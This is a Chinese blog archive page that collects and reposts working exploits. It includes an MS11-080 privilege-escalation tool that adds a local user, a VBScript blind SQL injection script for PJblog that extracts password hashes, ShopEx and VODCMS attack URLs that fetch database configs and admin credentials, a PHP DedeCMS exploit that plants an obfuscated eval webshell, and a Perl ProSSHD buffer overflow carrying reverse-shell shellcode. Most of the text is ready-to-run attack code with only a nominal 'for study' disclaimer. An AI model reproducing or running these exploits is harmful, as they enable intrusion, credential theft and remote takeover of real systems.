存档

‘漏洞收集’ 分类的存档

MS11080本地提权添加管理员EXP

2012年1月6日 13 条评论

        MS11080漏洞利用程序,源码来自国外,公开的exp是显示一个system权限的shell,不能带参数直接运行,按一个朋友需求改成可自定义cmd内容,使用方法如下:

XP  :   exp.exe XP “net user hacker /add”
2003:  exp.exe 2K3 “net user hacker /add”

非C,所以体积非常大,仅供学习参考!测试示意图如下:

点击下载

PJblog V3.0 0day Vbs版漏洞利用工具

2010年5月21日 没有评论

这个漏洞出来很久了,收藏下!

If WScript.Arguments.Count <> 2 Then
        WScript.Echo "Usage: Cscript.exe Exp.vbs 要检测的论坛网址 要检测的用户名"
        WScript.Echo "Example: Cscript.exe Exp.vbs http://www.pjhome.net puterjam"
        WScript.Quit
End If

attackUrl = WScript.Arguments(0)
attackUser = WScript.Arguments(1)
attackUrl = Replace(attackUrl,"\","/")
If Right(attackUrl , 1) <> "/" Then
        attackUrl = attackUrl & "/"
End If
SHA1Charset = "0123456789ABCDEFJ"
strHoleUrl = attackUrl & "action.asp?action=checkAlias&cname=0kee"""

If IsSuccess(strHoleUrl & "or ""1""=""1") And Not IsSuccess(strHoleUrl & "and ""1""=""2") Then
        WScript.Echo "恭喜!存在漏洞"
Else
        WScript.Echo "没有检测到漏洞"
        WScript.Quit
End If

For n=1 To 40
        For i=1 To 17
                strInject = strHoleUrl & " Or 0<(Select Count(*) From blog_member Where mem_name='" & attackUser & "' And mem_password>='" & strResult & Mid(SHA1Charset, i, 1) & "') And ""1""=""1"
                If Not IsSuccess(strInject) Then
                        strResult = strResult & Mid(SHA1Charset, i-1, 1)
                        Exit For
                End If
                strPrint = chr(13) & "Password(SHA1): " & strResult & Mid(SHA1Charset, i, 1)
                WScript.StdOut.Write strPrint
        Next
Next
WScript.Echo Chr(13) & Chr (10) & "Done!"

Function PostData(PostUrl)
        Dim Http
        Set Http = CreateObject("msxml2.serverXMLHTTP")
        With Http
                .Open "GET",PostUrl,False
                .Send ()
                PostData = .ResponseBody
        End With
        Set Http = Nothing
        PostData =bytes2BSTR(PostData)
End Function

Function bytes2BSTR(vIn)
        Dim strReturn
        Dim I, ThisCharCode, NextCharCode
        strReturn = ""
        For I = 1 To LenB(vIn)
                ThisCharCode = AscB(MidB(vIn, I, 1))
                If ThisCharCode < &H80 Then
                        strReturn = strReturn & Chr(ThisCharCode)
                Else
                        NextCharCode = AscB(MidB(vIn, I + 1, 1))
                        strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
                        I = I + 1
                End If
        Next
        bytes2BSTR = strReturn
End Function

Function IsSuccess(PostUrl)

strData = PostData(PostUrl)
'Wscript.Echo strData
if InStr(strData,"check_error") >0 then
        IsSuccess = True
Else
        IsSuccess = False
End If
'Wscript.Sleep 500 '让系统休息一下
End Function
分类: 漏洞收集 标签:

Shopex V4.8.4-4.8.5通杀漏洞

2010年4月24日 没有评论

作者:未知

影响版本:shopex V4.8.4 -V4.8.5

shopex 官方简介:

      上海商派网络科技有限公司始于2002年,是国内最早的网店软件提供商之一;是目前国内网店系统持续研发最久的公司;是目前网店软件国内市场占有率最高的软件提供商;是目前网店软件行业内规模最大的公司。ShopEx旗下的网上商店系统、网上商城系统以及丰富的网商工具,以专业的功能、领先的技术以及快速的价值体现,获得了45万用户的肯定。ShopEx秉承”向客户提供最专业的购物模式,做最好的网络购物软件”之理念,一直走在网络购物模式的前沿,致力于最大限度的降低网络购物系统建设成本,并为让网络购物、让电子商务更加走近普通人的生活而不断努力。

漏洞利用:

直接下载数据库配置文件:
http://www.007hack.com/shopadmin/index.php?ctl=sfile&act=getDB&p[0]=../../config/config.php

暴网站绝对路径:
http://www.007hack.com/install/svinfo.php?phpinfo=true

不走的钟提示Shopex非开源系统,本站不能提供解决方法,请大家随时关注官方补丁!

VODCMS 6.0搜索型注入漏洞

2010年4月7日 3 条评论

作者:不走的钟

来源:http://www.007hack.com/?p=544

官方描述:

 vodcms 点播管理系统,文全称为Video-On-Demand Content Management System,中文全称为 秀影。希望我们的努力能为您提供一个高效快速和强大的点播管理解决方案。

不走的钟做网站安全检测时,发现有一套VODCMS6.0系统,搜索的地方习惯性加一个单引号,错误如下:

很明显存在mysql搜索型注入,

SELECT COUNT(*) as total FROM vodcms_movie AS a WHERE 1=1 AND a.`locked` = 0 AND a.`title` LIKE ‘%1′%’ AND a.lookgid <> 2
我们来构造下sql语句,搜索:

1′ and 1=1 and ‘%’='   //返回页面正常,无报错,说明sql语法正确。

VODCMS默认后台为/admin/

下载VODCMS 6.0,解压后找到install\vodcms.sql部分内容如下:

-- 表的结构 `vodcms_admin`
--
DROP TABLE IF EXISTS `vodcms_admin`;
CREATE TABLE `vodcms_admin` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `username` char(30) NOT NULL,
  `password` char(32) NOT NULL,
  `realname` varchar(50) NOT NULL,
  `group` varchar(30) NOT NULL,
  `logintime` int(11) NOT NULL,
  `lastime` int(10) unsigned NOT NULL,
  `lastip` char(16) NOT NULL,
  `failed` tinyint(3) unsigned NOT NULL,
  `locked` tinyint(3) unsigned NOT NULL,
  PRIMARY KEY (`id`)
) TYPE=MyISAM  AUTO_INCREMENT=2 ;

这里不能使用union,如果有权限load_file虽然可以用,但是非常麻烦,如果你不知道网站路径,可以参考本站另一篇文章apache路径大全

知道了后台和管理员表,还可以通过肓注来获取管理员后台密码,代码如下:
管理员用户:

http://www.007hack.com/index.php?type=title&keyword=1' and (select ascii(substr((select username from vodcms_admin where id=1),1,1)))>=1 and '%'='&mod=content&action=search&x=22&y=17

管理员密码:

http://www.007hack.com/index.php?type=title&keyword=1' and (select ascii(substr((select password from password where id=1),1,1)))>=1 and '%'='&mod=content&action=search&x=22&y=17

当然这样手工很累,使用“关键字”写了一个小工具10分钟就跑出来了32的md5,工具很简单但不通用,这里不公开了。
小技巧:
网站根目录下的robots.txt可以查看版本信息,本文在6.0.0下测试通过。

说明:
由于VODCMS 6.0非开源代码(PHP已加密),本站无法提供解决方案,已通知官方,请大家等待补丁并及时更新。

 

 

DedeCms v5.5 最新漏洞

2010年3月9日 没有评论

作者:未知

受影响版本:DeDeCms V5.5(其它版本未测试)

漏洞文件:/plus/digg_ajax.php

EXP:

<?php
print_r(”
+—————————————-+
dedecms v5.5 final getwebshell exploit
+—————————————-+
“);
if ($argc < 3) {
print_r(”
+—————————————-+
Usage: php “.$argv[0].” host path
host:      target server (ip/hostname)
path:      path to dedecms
Example:
php “.$argv[0].” localhost /dedecms/
+—————————————-+   
“);
exit;
}
error_reporting(7);
ini_set(“max_execution_time”, 0);

$host = $argv[1];
$path = $argv[2];

$post_a = “plus/digg_ajax.php?id=1024e1024&*/fputs(fopen(chr(46).chr(46).chr(47).chr(100).chr(97).chr(116).chr(97).chr(47).chr(99).chr(97).chr(99).chr(104).chr(101).chr(47).chr(116).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(39).chr(116).chr(39).chr(93).chr(41).chr(59).chr(63).chr(62));/*”;
$post_b = “needCode=aa/../../../data/mysql_error_trace”;
$shell = “data/cache/t.php”;

get_send($post_a);
post_send(“plus/comments_frame.php”,$post_b);
$content = post_send($shell,”t=echo tojen;”);

if(substr($content,9,3)==”200″){
    echo “\nShell Address is:”.$host.$path.$shell;
}else{
    echo “\nError.”;
}
function get_send($url){
    global $host, $path;
    $message = “GET “.$path.”$url  HTTP/1.1\r\n”;
    $message .= “Accept: */*\r\n”;
    $message .= “Referer: http://$host$path\r\n“;
    $message .= “Accept-Language: zh-cn\r\n”;
    $message .= “Content-Type: application/x-www-form-urlencoded\r\n”;
    $message .= “User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n”;
    $message .= “Host: $host\r\n”;
    $message .= “Connection: Close\r\n\r\n”;
    $fp = fsockopen($host, 80);
    if(!$fp){
        echo “\nConnect to host Error”;
    }
    fputs($fp, $message);
   
    $back = “”;

    while (!feof($fp))
        $back .= fread($fp, 1024);
    fclose($fp);
    return $back;
   
}
function post_send($url,$cmd){
   
    global $host, $path;
    $message = “POST “.$path.”$url  HTTP/1.1\r\n”;
    $message .= “Accept: */*\r\n”;
    $message .= “Referer: http://$host$path\r\n“;
    $message .= “Accept-Language: zh-cn\r\n”;
    $message .= “Content-Type: application/x-www-form-urlencoded\r\n”;
    $message .= “User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n”;
    $message .= “Host: $host\r\n”;
    $message .= “Content-Length: “.strlen($cmd).”\r\n”;
    $message .= “Connection: Close\r\n\r\n”;
    $message .= $cmd;
    $fp = fsockopen($host, 80);
    if(!$fp){
        echo “\nConnect to host Error”;
    }
    fputs($fp, $message);
   
    $back = “”;

    while (!feof($fp))
        $back .= fread($fp, 1024);
    fclose($fp);
    return $back;
}
?>

分类: 漏洞收集 标签:

ProSSHD v1.2 20090726 Buffer Overflow Exploit

2010年3月7日 没有评论

 Author: S2 Crew [Hungary] 

# Tested on:  Windows XP SP2&#8232; EN 

# CVE: - 

  

# Registers: 

# EAX 000003E4 

# ECX 0012ED44 

# EDX 7C90EB94 ntdll.KiFastSystemCallRet 

# EBX 00000674 

# ESP 0012EFC0 ASCII “BBBBBBBBBBBBBBBBBB…” 

# EBP 0012F3DC ASCII “BBBBBBBBBBBBBBBBBB…” 

# ESI 7C81DD9A kernel32.CreatePipe 

# EDI 0012F3D8 ASCII “BBBBBBBBBBBBBBBBBBB…” 

# EIP 77D5B8D6 USER32.77D5B8D6 

  

#!/usr/bin/perl 

  

use Net::SSH2; 

  

$username = ‘test’; 

$password = ‘test’; 

  

$host = ’172.16.29.133′; 

$port = 22; 

  

[*] x86/alpha_mixed succeeded with size 692 (iteration=1) reverse_shell_tcp 

$shell = 

“\x89\xe5\xda\xd7\xd9\x75\xf4\x5e\x56\x59\x49\x49\x49\x49″ . 

“\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51″ . 

“\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32″ . 

“\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41″ . 

“\x42\x75\x4a\x49\x4b\x4c\x48\x68\x4e\x69\x45\x50\x47\x70″ . 

“\x43\x30\x51\x70\x4f\x79\x4b\x55\x44\x71\x4e\x32\x51\x74″ . 

“\x4e\x6b\x43\x62\x44\x70\x4e\x6b\x46\x32\x46\x6c\x4e\x6b” . 

“\x51\x42\x45\x44\x4c\x4b\x50\x72\x51\x38\x46\x6f\x4f\x47″ . 

“\x51\x5a\x51\x36\x50\x31\x4b\x4f\x45\x61\x4b\x70\x4e\x4c” . 

“\x47\x4c\x51\x71\x43\x4c\x47\x72\x46\x4c\x47\x50\x4a\x61″ . 

“\x48\x4f\x46\x6d\x45\x51\x4f\x37\x4d\x32\x4c\x30\x51\x42″ . 

“\x51\x47\x4e\x6b\x51\x42\x44\x50\x4c\x4b\x50\x42\x47\x4c” . 

“\x43\x31\x48\x50\x4e\x6b\x43\x70\x51\x68\x4e\x65\x49\x50″ . 

“\x43\x44\x42\x6a\x47\x71\x4e\x30\x50\x50\x4c\x4b\x50\x48″ . 

“\x47\x68\x4e\x6b\x46\x38\x51\x30\x45\x51\x4b\x63\x48\x63″ . 

“\x47\x4c\x51\x59\x4c\x4b\x50\x34\x4c\x4b\x45\x51\x48\x56″ . 

“\x45\x61\x49\x6f\x50\x31\x49\x50\x4c\x6c\x49\x51\x48\x4f” . 

“\x44\x4d\x45\x51\x4a\x67\x47\x48\x4d\x30\x50\x75\x48\x74″ . 

“\x43\x33\x43\x4d\x4c\x38\x45\x6b\x51\x6d\x46\x44\x43\x45″ . 

“\x4a\x42\x51\x48\x4e\x6b\x46\x38\x47\x54\x47\x71\x4a\x73″ . 

“\x42\x46\x4e\x6b\x44\x4c\x42\x6b\x4c\x4b\x51\x48\x47\x6c” . 

“\x46\x61\x4e\x33\x4c\x4b\x43\x34\x4c\x4b\x46\x61\x48\x50″ . 

“\x4d\x59\x43\x74\x44\x64\x46\x44\x51\x4b\x43\x6b\x50\x61″ . 

“\x43\x69\x51\x4a\x46\x31\x4b\x4f\x49\x70\x43\x68\x43\x6f” . 

“\x50\x5a\x4c\x4b\x42\x32\x48\x6b\x4b\x36\x51\x4d\x50\x68″ . 

“\x45\x63\x45\x62\x47\x70\x45\x50\x42\x48\x42\x57\x44\x33″ . 

“\x45\x62\x43\x6f\x46\x34\x42\x48\x50\x4c\x42\x57\x51\x36″ . 

“\x44\x47\x49\x6f\x4a\x75\x4f\x48\x4c\x50\x46\x61\x47\x70″ . 

“\x45\x50\x45\x79\x4f\x34\x46\x34\x46\x30\x50\x68\x45\x79″ . 

“\x4b\x30\x42\x4b\x47\x70\x49\x6f\x4b\x65\x46\x30\x42\x70″ . 

“\x42\x70\x42\x70\x51\x50\x46\x30\x51\x50\x50\x50\x43\x58″ . 

“\x4b\x5a\x46\x6f\x49\x4f\x49\x70\x4b\x4f\x4a\x75\x4d\x59″ . 

“\x4b\x77\x43\x58\x4c\x6c\x44\x50\x47\x6d\x4b\x30\x50\x68″ . 

“\x44\x42\x45\x50\x46\x71\x51\x4c\x4f\x79\x49\x76\x50\x6a” . 

“\x46\x70\x50\x56\x51\x47\x42\x48\x4a\x39\x4f\x55\x51\x64″ . 

“\x45\x31\x4b\x4f\x4a\x75\x50\x68\x42\x43\x50\x6d\x45\x34″ . 

“\x45\x50\x4e\x69\x4a\x43\x50\x57\x50\x57\x46\x37\x45\x61″ . 

“\x48\x76\x50\x6a\x44\x52\x43\x69\x42\x76\x4a\x42\x4b\x4d” . 

“\x43\x56\x4a\x67\x51\x54\x44\x64\x47\x4c\x43\x31\x45\x51″ . 

“\x4e\x6d\x42\x64\x45\x74\x44\x50\x4a\x66\x47\x70\x43\x74″ . 

“\x50\x54\x46\x30\x43\x66\x43\x66\x46\x36\x47\x36\x42\x76″ . 

“\x50\x4e\x51\x46\x43\x66\x46\x33\x46\x36\x50\x68\x51\x69″ . 

“\x4a\x6c\x45\x6f\x4b\x36\x49\x6f\x4b\x65\x4b\x39\x49\x70″ . 

“\x50\x4e\x50\x56\x47\x36\x49\x6f\x46\x50\x43\x58\x46\x68″ . 

“\x4e\x67\x45\x4d\x43\x50\x4b\x4f\x49\x45\x4d\x6b\x4a\x50″ . 

“\x4e\x55\x49\x32\x43\x66\x50\x68\x49\x36\x4a\x35\x4d\x6d” . 

“\x4d\x4d\x4b\x4f\x4a\x75\x45\x6c\x45\x56\x51\x6c\x45\x5a” . 

“\x4b\x30\x4b\x4b\x49\x70\x42\x55\x43\x35\x4f\x4b\x47\x37″ . 

“\x46\x73\x43\x42\x42\x4f\x51\x7a\x43\x30\x50\x53\x49\x6f” . 

“\x48\x55\x47\x7a\x41\x41″; 

  

# jmp esp 0x77dc7c7b user32.dll 

  

$fuzz = “\x41″x490 . “\x7B\x7C\xDC\x77″. “\x90″x1000 . $shell; 

  

  

$ssh2 = Net::SSH2->new(); 

$ssh2->connect($host, $port) || die “\nError: Connection Refused!\n”; 

$ssh2->auth_password($username, $password) || die “\nError: Username/Password Denied!\n”; 

$scpget = $ssh2->scp_get($fuzz); 

$ssh2->disconnect();

分类: 漏洞收集 标签: